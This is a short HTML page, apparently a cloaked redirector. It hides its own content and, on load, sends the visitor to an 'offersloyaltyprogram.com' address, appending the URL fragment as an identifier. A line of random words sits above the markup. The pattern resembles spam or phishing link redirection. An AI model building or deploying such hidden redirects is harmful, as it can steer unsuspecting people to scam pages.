equilibriums-prizefighters-resprinkle-medullae-metopic-meridie
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<style>
/* This hides the page so users don't see a blank screen before redirecting */
body {
visibility: hidden;
}
</style>
<script>
// 1. Get the current URL
var link_c = window.location.href;
// 2. Extract the part after the '#' (Added quotes around #)
// Example: if your link is site.com/#12345, compliment becomes 12345
var compliment = link_c.split('#')[1];
// 3. Redirect to the target URL (Added quotes and fixed concatenation)
// If compliment exists, it adds it to the end of the URL
if (compliment) {
window.location.replace("https://www.rd-eu-2.offersloyaltyprogram.com/" + compliment);
} else {
window.location.replace("https://www.rd-eu-2.offersloyaltyprogram.com/");
}
</script>
</head>
<body>
<!-- The page is empty and hidden -->
<div></div>
</body>
</html>